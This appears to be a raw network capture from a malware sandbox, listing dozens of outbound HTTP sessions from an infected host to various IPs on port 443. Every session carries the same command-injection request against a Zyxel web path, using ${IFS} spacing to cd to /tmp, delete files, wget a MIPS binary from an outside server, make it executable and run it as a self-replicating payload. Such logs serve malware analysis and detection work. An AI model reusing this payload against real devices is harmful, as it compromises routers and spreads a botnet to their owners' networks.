                                                        Feb 2, 2024 06:21:22.185288906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7524192.168.2.1459108188.20.230.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185333967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7525192.168.2.1450100111.136.242.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185362101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7526192.168.2.144047473.123.221.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185385942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7527192.168.2.1452102134.153.16.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185446978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7528192.168.2.144740448.85.25.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185477972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7529192.168.2.1435050152.253.6.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185518026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7530192.168.2.1433666145.238.229.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185549974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7531192.168.2.1436078192.217.34.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185592890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7532192.168.2.1442414105.75.132.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185628891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7533192.168.2.1443494212.44.156.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185667038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7534192.168.2.1441554132.150.75.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185702085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7535192.168.2.1448054121.250.230.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185750008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7536192.168.2.143635484.75.3.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185796022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7537192.168.2.1439008167.137.226.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185822010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7538192.168.2.1439182158.77.241.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185868025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7539192.168.2.14404344.172.131.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185894966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7540192.168.2.1453682210.90.123.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185952902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7541192.168.2.144676875.63.100.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.185976028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7542192.168.2.144148236.152.151.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186009884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7543192.168.2.145260488.247.51.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186058044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7544192.168.2.1454642133.18.187.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186108112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7545192.168.2.143692667.115.158.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186141968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7546192.168.2.1459422154.133.224.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186202049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7547192.168.2.145130440.17.245.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186227083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7548192.168.2.144045644.143.31.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186259031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7549192.168.2.144358837.161.105.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186290026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7550192.168.2.144691693.196.2.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186321020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7551192.168.2.1435514162.108.8.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186357975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7552192.168.2.145498473.15.153.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186383963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7553192.168.2.1453670177.70.218.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186429977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7554192.168.2.1449734200.90.88.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186477900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7555192.168.2.143688213.132.39.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186528921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7556192.168.2.144451890.231.106.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186556101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7557192.168.2.1436226138.109.172.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186590910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7558192.168.2.144365247.142.235.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186647892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7559192.168.2.144571097.106.190.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186672926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7560192.168.2.145811417.20.128.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186705112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7561192.168.2.1437152198.73.130.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186762094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7562192.168.2.1457506219.56.185.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186805964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7563192.168.2.1443060189.103.222.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186841965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7564192.168.2.1442176196.78.40.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186893940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7565192.168.2.1443384180.38.195.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186913013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7566192.168.2.143481034.9.216.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186959982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7567192.168.2.143397646.7.162.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.186984062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7568192.168.2.145718647.11.34.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187006950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7569192.168.2.145558083.4.10.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187051058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7570192.168.2.1453190139.46.155.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187074900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7571192.168.2.1450482161.233.135.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187119007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7572192.168.2.1452052140.31.25.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187154055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7573192.168.2.1436498134.117.62.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187186956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7574192.168.2.14543985.12.52.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187227011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7575192.168.2.143378044.243.147.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187282085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7576192.168.2.1446852100.192.54.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187324047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7577192.168.2.1438718110.65.92.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187346935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7578192.168.2.1446414198.33.56.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187372923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7579192.168.2.1435646141.192.72.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187405109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7580192.168.2.1441676148.79.250.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187448978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7581192.168.2.1450662168.119.181.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187508106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7582192.168.2.143627298.69.135.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187519073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7583192.168.2.1450744164.174.32.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187567949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7584192.168.2.14389125.199.138.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.187597990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7585192.168.2.1459326184.145.18.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.199717999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7586192.168.2.1456628137.209.95.228443
                                                        TimestampBytes transferredDirectionData
